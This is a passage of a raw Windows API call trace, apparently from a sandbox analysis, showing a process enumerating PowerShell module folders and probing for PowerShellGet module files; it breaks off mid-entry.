lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x933e780 | out: lpFindFileData=0x933e780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc9fecb3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x784d9c0 [0218.793] FindNextFileW (in: hFindFile=0x784d9c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbc9fecb3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.793] FindNextFileW (in: hFindFile=0x784d9c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbca000ca, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b27bb25, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0218.794] FindNextFileW (in: hFindFile=0x784d9c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0218.794] FindClose (in: hFindFile=0x784d9c0 | out: hFindFile=0x784d9c0) returned 1 [0218.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea14) returned 1 [0218.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0218.794] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0218.794] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0218.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9ec) returned 1 [0218.794] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x933ea68 | out: lpFileInformation=0x933ea68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a83f191, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5eab1ff, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5eab1ff, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xadf)) returned 1 [0218.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e8) returned 1 [0218.796] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0218.796] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0218.796] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5a [0218.796] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x5a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x59 [0218.796] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea10) returned 1 [0218.796] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x57e32c0 | out: lpFileInformation=0x57e32c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a83f191, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5eab1ff, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5eab1ff, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xadf)) returned 1 [0218.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea0c) returned 1 [0218.796] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0218.796] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0218.796] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0218.797] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0218.797] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.ni.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.ni.dll")) returned 0xffffffff [0218.797] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0218.799] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules")) returned 0x10 [0218.800] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea58) returned 1 [0218.800] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x33 [0218.800] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x33, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0218.800] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\*", lpFindFileData=0x933e780 | out: lpFindFileData=0x933e780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x55ba8b37, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x55ba8b37, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x784dac0 [0218.801] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x55ba8b37, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x55ba8b37, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.802] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6e35c2e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x1902eb1, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0xe9611c78, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0218.802] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6e35c2e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x197a24f, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x76586f17, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppvClient", cAlternateFileName="APPVCL~1")) returned 1 [0218.802] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x197bc54, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x206e0505, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0218.802] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x197c4d1, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x206e0505, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0218.802] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xe6e5be8c, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x197cd93, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0xe966970b, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0218.802] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x197d5fb, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x206e0505, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0218.803] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x19ea3b1, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20706767, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0218.803] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x19eb58e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8cfff4c6, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0218.803] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x19ec84e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20706767, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0218.803] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a636cb, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0218.803] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a63ff3, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0218.803] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a648ba, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0218.804] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a65091, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0218.804] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a65832, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0218.804] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a6609c, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d025724, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0218.804] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a67503, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0218.804] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a67e99, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0218.804] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a686f1, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0218.805] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1ac9e27, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d025724, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0218.805] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acae81, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20752c33, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0218.805] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acb52e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20752c33, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0218.805] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acc005, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20752c33, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0218.805] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acdc29, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d025724, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0218.805] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x243555cf, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x243555cf, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSMQ", cAlternateFileName="")) returned 1 [0218.806] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acff90, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2079f100, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0218.806] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1bb671a, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2079f100, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0218.806] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1bb70fa, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x207c536a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0218.806] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1c2fdb4, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x207c536a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0218.806] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1c7d5c2, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x207eb5c8, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0218.807] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1c7e767, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x207eb5c8, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0218.807] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, 